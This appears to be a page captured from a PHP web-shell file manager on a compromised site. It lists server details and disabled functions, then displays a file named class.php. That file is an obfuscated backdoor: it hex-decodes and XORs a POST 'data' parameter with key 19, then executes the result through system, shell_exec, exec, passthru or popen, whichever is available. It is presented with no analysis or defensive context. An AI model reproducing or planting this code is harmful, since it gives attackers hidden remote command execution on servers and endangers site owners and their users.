HEX
Server: nginx/1.26.0
System: Linux iZj6ceg0gjdkbpnmyl2cnnZ 5.15.60-1.el7.x86_64 #1 SMP Thu Aug 11 12:39:22 UTC 2022 x86_64
User: www (1000)
PHP: 7.0.33
Disabled: phpinfo,eval,passthru,exec,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,pfsockopen,fsocket,fsockopen
Upload Files
File: /data/wwwroot/sites/multitrustcapital.com/www/class.php
<?php
//<PHPDATA>cmd_xor;19;data</PHPDATA>
$_0="pclose";$_1="exec";$_2="hex\062bin";$_3="pa\163sthru";$_4="p\157p\x65n";$_5="stream\137\x67et_co\156\164en\164s";$_6="shel\154_exe\143";$_7="\x73\x79s\164em";if(isset($_POST["\x64ata"])):function _0($_8,$_9){$_10="";$_11=(int)rouNd(0+0+0);while($_11<STrlEn($_8)):$_10.=Chr(ORD($_8[$_11])^$_9);$_11++;endwhile;return$_10;}$_12=$_2($_POST["d\141t\x61"]);$_12=_0($_12,(int)Round(9.5+9.5));if(FuNCtIOn_EXiSTs($_7)):$_7($_12);elseif(FUNcTIon_exISTs($_6)):print$_6($_12);elseif(functION_eXisTS($_1)):$_1($_12,$_13);print JoiN("\x0a",$_13);elseif(fUNCTION_EXiSTS($_3)):$_3($_12);elseif(FunCtion_EXISts($_4)&&FuNcTION_eXISTS($_5)&&FUnctiOn_existS($_0)):$_14=$_4($_12,"r");if($_14):$_15=$_5($_14);$_0($_14);print$_15;endif;endif;exit;endif;